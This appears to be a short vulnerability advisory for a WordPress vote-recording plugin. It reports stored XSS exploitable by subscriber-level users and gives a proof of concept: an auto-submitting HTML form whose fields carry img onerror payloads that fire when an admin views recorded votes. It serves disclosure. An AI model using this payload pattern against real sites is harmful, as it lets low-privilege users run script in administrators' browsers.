Description The plugin is missing sanitisation as well as escaping, which could allow any authenticated users, such as subscriber to perform Stored XSS attacks
Have a subscriber open an HTML file containing the following:
```
<form action="http://localhost:8888/wordpress/wp-admin/index.php" method="POST">
<input type="text" name="bill" value="1">
<input type="text" name="description" value='subscriber"><img src=x onerror=alert(19)>'>
<input type="text" name="vote" value="Yea">
<input type="text" name="voter" value='subscriber"><img src=x onerror=alert(20)>'>
<input type="text" name="date" value="2022-12-10">
<input type="text" name="result" value="pass">
<input type="text" name="tally" value="3">
<input type="text" name="record_vote" value="Save">
</form>
<script>
document.forms[0].submit();
</script>
```
See the XSS when logged in as an admin and viewing recorded votes.